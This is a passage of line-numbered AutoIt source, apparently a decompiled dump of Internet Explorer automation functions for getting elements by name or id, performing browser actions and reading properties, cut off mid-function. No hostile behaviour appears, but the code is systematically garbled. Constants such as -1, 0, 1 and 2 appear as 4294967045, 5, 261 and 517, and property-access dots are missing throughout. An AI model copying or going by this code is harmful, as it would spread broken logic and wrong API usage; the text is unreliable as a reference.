  2410. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  2411. __IECONSOLEWRITEERROR ( "Error" , "_IETagNameAllGetCollection" , "$_IESTATUS_InvalidObjectType" )
  2412. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2413. ENDIF
  2414. LOCAL $OTEMP
  2415. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) THEN
  2416. $OTEMP = _IEDOCGETOBJ ( $OOBJECT )
  2417. ELSE
  2418. $OTEMP = $OOBJECT
  2419. ENDIF
  2420. $IINDEX = NUMBER ( $IINDEX )
  2421. SELECT
  2422. CASE $IINDEX = + 4294967045
  2423. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OTEMP.all length , $OTEMP.all )
  2424. CASE $IINDEX > + 4294967045 AND $IINDEX < $OTEMP.all length
  2425. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OTEMP.all length , $OTEMP.all item ( $IINDEX ) )
  2426. CASE $IINDEX < + 4294967045
  2427. __IECONSOLEWRITEERROR ( "Error" , "_IETagNameAllGetCollection" , "$_IESTATUS_InvalidValue" , "$iIndex < -1" )
  2428. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  2429. CASE ELSE
  2430. __IECONSOLEWRITEERROR ( "Error" , "_IETagNameAllGetCollection" , "$_IESTATUS_NoMatch" )
  2431. RETURN SETERROR ( $_IESTATUS_NOMATCH , 261 , 5 )
  2432. ENDSELECT
  2433. ENDFUNC
  2434. FUNC _IEGETOBJBYNAME ( BYREF $OOBJECT , $SNAME , $IINDEX = 5 )
  2435. IF NOT ISOBJ ( $OOBJECT ) THEN
  2436. __IECONSOLEWRITEERROR ( "Error" , "_IEGetObjByName" , "$_IESTATUS_InvalidDataType" )
  2437. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2438. ENDIF
  2439. $IINDEX = NUMBER ( $IINDEX )
  2440. IF $IINDEX = + 4294967045 THEN
  2441. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.document GetElementsByName ( $SNAME ) length , $OOBJECT.document GetElementsByName ( $SNAME ) )
  2442. ELSE
  2443. IF ISOBJ ( $OOBJECT.document GetElementsByName ( $SNAME ) item ( $IINDEX ) ) THEN
  2444. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.document GetElementsByName ( $SNAME ) length , $OOBJECT.document GetElementsByName ( $SNAME ) item ( $IINDEX ) )
  2445. ELSE
  2446. __IECONSOLEWRITEERROR ( "Warning" , "_IEGetObjByName" , "$_IESTATUS_NoMatch" , "Name: " & $SNAME & ", Index: " & $IINDEX )
  2447. RETURN SETERROR ( $_IESTATUS_NOMATCH , 5 , 5 )
  2448. ENDIF
  2449. ENDIF
  2450. ENDFUNC
  2451. FUNC _IEGETOBJBYID ( BYREF $OOBJECT , $SID )
  2452. IF NOT ISOBJ ( $OOBJECT ) THEN
  2453. __IECONSOLEWRITEERROR ( "Error" , "_IEGetObjById" , "$_IESTATUS_InvalidDataType" )
  2454. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2455. ENDIF
  2456. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  2457. __IECONSOLEWRITEERROR ( "Error" , "_IEGetObById" , "$_IESTATUS_InvalidObjectType" )
  2458. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2459. ENDIF
  2460. IF ISOBJ ( $OOBJECT.document getElementById ( $SID ) ) THEN
  2461. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document getElementById ( $SID ) )
  2462. ELSE
  2463. __IECONSOLEWRITEERROR ( "Warning" , "_IEGetObjById" , "$_IESTATUS_NoMatch" , $SID )
  2464. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  2465. ENDIF
  2466. ENDFUNC
  2467. FUNC _IEACTION ( BYREF $OOBJECT , $SACTION )
  2468. IF NOT ISOBJ ( $OOBJECT ) THEN
  2469. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(" & $SACTION & ")" , "$_IESTATUS_InvalidDataType" )
  2470. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2471. ENDIF
  2472. $SACTION = STRINGLOWER ( $SACTION )
  2473. SELECT
  2474. CASE $SACTION = "click"
  2475. IF __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2476. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(click)" , " $_IESTATUS_InvalidObjectType" )
  2477. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2478. ENDIF
  2479. $OOBJECT.Click ( )
  2480. CASE $SACTION = "disable"
  2481. IF __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2482. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(disable)" , " $_IESTATUS_InvalidObjectType" )
  2483. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2484. ENDIF
  2485. $OOBJECT.disabled = TRUE
  2486. CASE $SACTION = "enable"
  2487. IF __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2488. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(enable)" , " $_IESTATUS_InvalidObjectType" )
  2489. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2490. ENDIF
  2491. $OOBJECT.disabled = FALSE
  2492. CASE $SACTION = "focus"
  2493. IF __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2494. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(focus)" , "$_IESTATUS_InvalidObjectType" )
  2495. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2496. ENDIF
  2497. $OOBJECT.Focus ( )
  2498. CASE $SACTION = "scrollintoview"
  2499. IF __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2500. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(scrollintoview)" , "$_IESTATUS_InvalidObjectType" )
  2501. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2502. ENDIF
  2503. $OOBJECT.scrollIntoView ( )
  2504. CASE $SACTION = "copy"
  2505. $OOBJECT.document execCommand ( "Copy" )
  2506. CASE $SACTION = "cut"
  2507. $OOBJECT.document execCommand ( "Cut" )
  2508. CASE $SACTION = "paste"
  2509. $OOBJECT.document execCommand ( "Paste" )
  2510. CASE $SACTION = "delete"
  2511. $OOBJECT.document execCommand ( "Delete" )
  2512. CASE $SACTION = "saveas"
  2513. $OOBJECT.document execCommand ( "SaveAs" )
  2514. CASE $SACTION = "refresh"
  2515. $OOBJECT.document execCommand ( "Refresh" )
  2516. IF @ERROR THEN
  2517. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(refresh)" , "$_IESTATUS_COMError" , @ERROR )
  2518. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2519. ENDIF
  2520. _IELOADWAIT ( $OOBJECT )
  2521. CASE $SACTION = "selectall"
  2522. $OOBJECT.document execCommand ( "SelectAll" )
  2523. CASE $SACTION = "unselect"
  2524. $OOBJECT.document execCommand ( "Unselect" )
  2525. CASE $SACTION = "print"
  2526. $OOBJECT.document parentwindow Print ( )
  2527. CASE $SACTION = "printdefault"
  2528. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2529. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(printdefault)" , "$_IESTATUS_InvalidObjectType" )
  2530. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2531. ENDIF
  2532. $OOBJECT.execWB ( 1541 , 517 )
  2533. CASE $SACTION = "back"
  2534. IF NOT __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2535. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(back)" , "$_IESTATUS_InvalidObjectType" )
  2536. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2537. ENDIF
  2538. $OOBJECT.GoBack ( )
  2539. CASE $SACTION = "blur"
  2540. $OOBJECT.Blur ( )
  2541. CASE $SACTION = "forward"
  2542. IF NOT __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2543. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(forward)" , "$_IESTATUS_InvalidObjectType" )
  2544. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2545. ENDIF
  2546. $OOBJECT.GoForward ( )
  2547. CASE $SACTION = "home"
  2548. IF NOT __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2549. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(home)" , "$_IESTATUS_InvalidObjectType" )
  2550. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2551. ENDIF
  2552. $OOBJECT.GoHome ( )
  2553. CASE $SACTION = "invisible"
  2554. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2555. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(invisible)" , "$_IESTATUS_InvalidObjectType" )
  2556. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2557. ENDIF
  2558. $OOBJECT.visible = 5
  2559. CASE $SACTION = "visible"
  2560. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2561. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(visible)" , "$_IESTATUS_InvalidObjectType" )
  2562. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2563. ENDIF
  2564. $OOBJECT.visible = 261
  2565. CASE $SACTION = "search"
  2566. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2567. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(search)" , "$_IESTATUS_InvalidObjectType" )
  2568. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2569. ENDIF
  2570. $OOBJECT.GoSearch ( )
  2571. CASE $SACTION = "stop"
  2572. IF NOT __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  2573. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(stop)" , "$_IESTATUS_InvalidObjectType" )
  2574. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2575. ENDIF
  2576. $OOBJECT.Stop ( )
  2577. CASE $SACTION = "quit"
  2578. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2579. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(quit)" , "$_IESTATUS_InvalidObjectType" )
  2580. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2581. ENDIF
  2582. $OOBJECT.Quit ( )
  2583. IF @ERROR THEN
  2584. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(" & $SACTION & ")" , "$_IESTATUS_COMError" , @ERROR )
  2585. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2586. ENDIF
  2587. $OOBJECT = 5
  2588. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  2589. CASE ELSE
  2590. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(" & $SACTION & ")" , "$_IESTATUS_InvalidValue" , "Invalid Action" )
  2591. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  2592. ENDSELECT
  2593. IF @ERROR THEN
  2594. __IECONSOLEWRITEERROR ( "Error" , "_IEAction(" & $SACTION & ")" , "$_IESTATUS_COMError" , @ERROR )
  2595. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2596. ENDIF
  2597. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  2598. ENDFUNC
  2599. FUNC _IEPROPERTYGET ( BYREF $OOBJECT , $SPROPERTY )
  2600. IF NOT ISOBJ ( $OOBJECT ) THEN
  2601. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidDataType" )
  2602. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2603. ENDIF
  2604. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  2605. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2606. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2607. ENDIF
  2608. LOCAL $OTEMP , $ITEMP
  2609. $SPROPERTY = STRINGLOWER ( $SPROPERTY )
  2610. SELECT
  2611. CASE $SPROPERTY = "browserx"
  2612. IF __IEISOBJTYPE ( $OOBJECT , "browsercontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2613. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2614. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2615. ENDIF
  2616. $OTEMP = $OOBJECT
  2617. $ITEMP = 5
  2618. WHILE ISOBJ ( $OTEMP )
  2619. $ITEMP += $OTEMP.offsetLeft
  2620. $OTEMP = $OTEMP.offsetParent
  2621. WEND
  2622. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $ITEMP )
  2623. CASE $SPROPERTY = "browsery"
  2624. IF __IEISOBJTYPE ( $OOBJECT , "browsercontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2625. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2626. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2627. ENDIF
  2628. $OTEMP = $OOBJECT
  2629. $ITEMP = 5
  2630. WHILE ISOBJ ( $OTEMP )
  2631. $ITEMP += $OTEMP.offsetTop
  2632. $OTEMP = $OTEMP.offsetParent
  2633. WEND
  2634. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $ITEMP )
  2635. CASE $SPROPERTY = "screenx"
  2636. IF __IEISOBJTYPE ( $OOBJECT , "window" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2637. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2638. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2639. ENDIF
  2640. IF __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2641. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.left ( ) )
  2642. ELSE
  2643. $OTEMP = $OOBJECT
  2644. $ITEMP = 5
  2645. WHILE ISOBJ ( $OTEMP )
  2646. $ITEMP += $OTEMP.offsetLeft
  2647. $OTEMP = $OTEMP.offsetParent
  2648. WEND
  2649. ENDIF
  2650. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $ITEMP + $OOBJECT.document parentWindow screenLeft )
  2651. CASE $SPROPERTY = "screeny"
  2652. IF __IEISOBJTYPE ( $OOBJECT , "window" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2653. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2654. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2655. ENDIF
  2656. IF __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2657. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.top ( ) )
  2658. ELSE
  2659. $OTEMP = $OOBJECT
  2660. $ITEMP = 5
  2661. WHILE ISOBJ ( $OTEMP )
  2662. $ITEMP += $OTEMP.offsetTop
  2663. $OTEMP = $OTEMP.offsetParent
  2664. WEND
  2665. ENDIF
  2666. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $ITEMP + $OOBJECT.document parentWindow screenTop )
  2667. CASE $SPROPERTY = "height"
  2668. IF __IEISOBJTYPE ( $OOBJECT , "window" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2669. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2670. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2671. ENDIF
  2672. IF __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2673. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.Height ( ) )
  2674. ELSE
  2675. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.offsetHeight )
  2676. ENDIF
  2677. CASE $SPROPERTY = "width"
  2678. IF __IEISOBJTYPE ( $OOBJECT , "window" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2679. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2680. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2681. ENDIF
  2682. IF __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2683. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.Width ( ) )
  2684. ELSE
  2685. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.offsetWidth )
  2686. ENDIF
  2687. CASE $SPROPERTY = "isdisabled"
  2688. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.isDisabled ( ) )
  2689. CASE $SPROPERTY = "addressbar"
  2690. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2691. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2692. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2693. ENDIF
  2694. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.AddressBar ( ) )
  2695. CASE $SPROPERTY = "busy"
  2696. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2697. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2698. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2699. ENDIF
  2700. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.Busy ( ) )
  2701. CASE $SPROPERTY = "fullscreen"
  2702. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2703. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2704. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2705. ENDIF
  2706. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.fullScreen ( ) )
  2707. CASE $SPROPERTY = "hwnd"
  2708. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2709. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2710. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2711. ENDIF
  2712. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , HWND ( $OOBJECT.HWnd ( ) ) )
  2713. CASE $SPROPERTY = "left"
  2714. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2715. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2716. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2717. ENDIF
  2718. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.Left ( ) )
  2719. CASE $SPROPERTY = "locationname"
  2720. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2721. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2722. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2723. ENDIF
  2724. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.LocationName ( ) )
  2725. CASE $SPROPERTY = "locationurl"
  2726. IF __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2727. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.locationURL ( ) )
  2728. ENDIF
  2729. IF __IEISOBJTYPE ( $OOBJECT , "window" ) THEN
  2730. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.location href ( ) )
  2731. ENDIF
  2732. IF __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2733. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.parentwindow location href ( ) )
  2734. ENDIF
  2735. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentwindow location href ( ) )
  2736. CASE $SPROPERTY = "menubar"
  2737. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2738. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2739. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2740. ENDIF
  2741. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.MenuBar ( ) )
  2742. CASE $SPROPERTY = "offline"
  2743. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2744. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2745. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2746. ENDIF
  2747. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.OffLine ( ) )
  2748. CASE $SPROPERTY = "readystate"
  2749. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2750. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2751. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2752. ENDIF
  2753. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.ReadyState ( ) )
  2754. CASE $SPROPERTY = "resizable"
  2755. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2756. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2757. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2758. ENDIF
  2759. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.Resizable ( ) )
  2760. CASE $SPROPERTY = "silent"
  2761. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2762. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2763. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2764. ENDIF
  2765. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.Silent ( ) )
  2766. CASE $SPROPERTY = "statusbar"
  2767. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2768. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2769. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2770. ENDIF
  2771. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.StatusBar ( ) )
  2772. CASE $SPROPERTY = "statustext"
  2773. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2774. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2775. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2776. ENDIF
  2777. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.StatusText ( ) )
  2778. CASE $SPROPERTY = "top"
  2779. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2780. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2781. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2782. ENDIF
  2783. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.Top ( ) )
  2784. CASE $SPROPERTY = "visible"
  2785. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2786. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2787. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2788. ENDIF
  2789. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.Visible ( ) )
  2790. CASE $SPROPERTY = "appcodename"
  2791. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator appCodeName ( ) )
  2792. CASE $SPROPERTY = "appminorversion"
  2793. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator appMinorVersion ( ) )
  2794. CASE $SPROPERTY = "appname"
  2795. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator appName ( ) )
  2796. CASE $SPROPERTY = "appversion"
  2797. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator appVersion ( ) )
  2798. CASE $SPROPERTY = "browserlanguage"
  2799. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator browserLanguage ( ) )
  2800. CASE $SPROPERTY = "cookieenabled"
  2801. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator cookieEnabled ( ) )
  2802. CASE $SPROPERTY = "cpuclass"
  2803. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator cpuClass ( ) )
  2804. CASE $SPROPERTY = "javaenabled"
  2805. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator javaEnabled ( ) )
  2806. CASE $SPROPERTY = "online"
  2807. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator onLine ( ) )
  2808. CASE $SPROPERTY = "platform"
  2809. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator platform ( ) )
  2810. CASE $SPROPERTY = "systemlanguage"
  2811. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator systemLanguage ( ) )
  2812. CASE $SPROPERTY = "useragent"
  2813. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator userAgent ( ) )
  2814. CASE $SPROPERTY = "userlanguage"
  2815. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document parentWindow top navigator userLanguage ( ) )
  2816. CASE $SPROPERTY = "referrer"
  2817. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document referrer )
  2818. CASE $SPROPERTY = "theatermode"
  2819. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2820. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2821. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2822. ENDIF
  2823. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.TheaterMode )
  2824. CASE $SPROPERTY = "toolbar"
  2825. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2826. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2827. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2828. ENDIF
  2829. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.ToolBar )
  2830. CASE $SPROPERTY = "contenteditable"
  2831. IF __IEISOBJTYPE ( $OOBJECT , "browser" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2832. $OTEMP = $OOBJECT.document body
  2833. ELSE
  2834. $OTEMP = $OOBJECT
  2835. ENDIF
  2836. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OTEMP.isContentEditable )
  2837. CASE $SPROPERTY = "innertext"
  2838. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2839. $OTEMP = $OOBJECT.document body
  2840. ELSE
  2841. $OTEMP = $OOBJECT
  2842. ENDIF
  2843. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OTEMP.innerText )
  2844. CASE $SPROPERTY = "outertext"
  2845. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
